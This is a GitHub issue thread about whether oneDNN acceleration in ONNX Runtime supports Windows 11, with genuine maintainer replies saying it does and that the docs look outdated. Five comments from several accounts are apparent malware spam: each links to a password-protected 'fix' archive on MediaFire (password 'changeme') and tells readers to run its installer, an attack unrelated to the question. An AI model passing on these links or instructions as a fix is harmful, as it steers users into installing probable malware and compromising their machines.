### ISSUE TITLE
Is ONNX support oneDNN with windows 11?

### ISSUE THREAD

**Issue by yunhaolsh** [oneapi-src/oneDNN#2057]
[https://onnxruntime.ai/docs/execution-providers/oneDNN-ExecutionProvider.html#support-coverage](url)
this page Support Coverage says windows 10, how about windows 11?
if support，how can i config oneDNN within ONNX after i build onnx with the commond '.\build.bat --use_dnnl'?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yehudaorel** [comment]
Hi @yunhaolsh, Yes both latest ONNX and oneDNN support windows 11. 

May I know what you are specifically trying to configure with oneDNN? If you are referring to oneDNN build configuration from source you can find available options here: https://oneapi-src.github.io/oneDNN/dev_guide_build_options.html

**Comment by yunhaolsh** [comment]
> Hi @yunhaolsh, Yes both latest ONNX and oneDNN support windows 11.
> 
> May I know what you are specifically trying to configure with oneDNN? If you are referring to oneDNN build configuration from source you can find available options here: https://oneapi-src.github.io/oneDNN/dev_guide_build_options.html

I want to enable oneDNN in onnx to accelerate cpu. Only windows10 is written in the Support Coverage of this document, so I would like to know whether it is applicable in windows11. Thanks a lot.
[https://onnxruntime.ai/docs/execution-providers/oneDNN-ExecutionProvider.html#support-coverage](url)

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by shu1chen** [comment]
Hi @yunhaolsh The information on the [support-coverage section](https://onnxruntime.ai/docs/execution-providers/oneDNN-ExecutionProvider.html#support-coverage) seems to be outdated. Since you have submitted microsoft/onnxruntime#21856, let's wait for the onnxruntime team to verify and fix it.

> I want to enable oneDNN in onnx to accelerate cpu.

ONNX runtime wraps the APIs and provides the oneDNN execution provider. The [usage section](https://onnxruntime.ai/docs/execution-providers/oneDNN-ExecutionProvider.html#usage) lists the ways to call oneDNN execution provider as well as documentation links to C/Python APIs.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
